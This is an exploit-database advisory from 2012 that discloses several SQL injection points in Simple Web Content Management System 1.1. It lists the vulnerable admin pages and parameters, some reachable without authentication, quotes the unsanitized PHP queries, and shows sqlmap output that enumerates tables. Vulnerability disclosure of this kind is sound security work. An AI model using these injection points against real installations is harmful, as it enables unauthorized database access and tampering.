Simple Web Content Management System 1.1 Multiple SQL Injection



EKU-ID: 2221 CVE: OSVDB-ID:
Author: loneferret Published: 2012-06-01 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


######################################################################################
# Exploit Title: Simple Web Content Management System SQL Injection
# Date: May 30th 2012
# Author: loneferret
# Version: 1.1
# Application Url: http://www.cms-center.com/
# Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23
######################################################################################
# Discovered by: loneferret
######################################################################################

# Side note:
# This application is nothing fancy, and really shouldn't be used other than
# for practicing SQLi. Pretty much every page has at least one (1) vulnerable
# parameter.

# Vulnerability:
# Due to improper input sanitization, many parameters are prone to SQL injection.
# Most of them require to be authenticated with an account (admin).
# But there are a few pages that will cause an error without having to logon.


# PoC 1:
# No Authentication Required.
# Page: /admin/item_delete.php?id=[SQLi]
# Vulnerable Parameter: id
# Code:
15      $id = $_GET['id'];
16      $title = NULL;
17      $text = NULL;
18      database_connect();
19      $query = "select title,text from content where id = $id;";
20      //echo $query;
21      $result = mysql_query($query);

# As stated, nothing is checked before passing "id" to MySql.
# This results in a MySql error.

 

# PoC 2:
# No Authentication Required.
# Page: /admin/item_status.php?id=[SQLi]&status=1
# Page: /admin/item_status.php?id=1&status=[SQLi]
# Vulnerable Parameter: id & status
# Code:
10 $ref = $_GET['ref'];
11 $id = $_GET['id'];
12 $status = $_GET['status'];
13 $update = "UPDATE content
14   SET status='$status'
15   WHERE id='$id'";
16 $query = mysql_query($update)
  or die("Their was a problem updating the status: ". mysql_error());

# As stated, nothing is checked before passing "id" and/or "status" to MySql.
# This results in a MySql error.

 

# PoC 3:
# Authentication Required.
# Page: /admin/item_detail.php?id=[SQLi]
# Vulnerable Parameter: id
# Code:
15     $id = $_GET['id'];
16     $title = NULL;
17     $text = NULL;
18     database_connect();
19     $query = "select title,text from content where id = $id;";
20     //echo $query;
21     $result = mysql_query($query);

# As stated, nothing is checked before passing "id" to MySql.
# This results in a MySql error.


# PoC 4:
# Authentication Required.
# Page: /admin/item_modify.php?id=[SQLi]
# Vulnerable Parameter: id
# Code:
60 database_connect();  
61 if(isset($_GET['id'])) {
62  $id = ($_GET['id']);
63 }
64 $select = "SELECT *
65   FROM content
66   where id = '$id'";
67 $query = mysql_query($select);

# As stated, nothing is checked before passing "id" to MySql.
# This results in a MySql error.

# PoC 6:
# Authencitation Required.
# Page: /admin/item_position.php?id=[SQLi]&mode=up
# Vulnerable Parameter: id
.
...ok I think we get the idea now.
.
.
#  
# Example output:
#
[19:40:22] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[19:40:22] [INFO] fetching tables for database: phpcms
[19:40:22] [INFO] heuristics detected web page charset 'ascii'
[19:40:22] [INFO] the SQL query used returns 1 entries
[19:40:22] [INFO] retrieved: content
Database: phpcms
[1 table]
+---------+
| content |
+---------+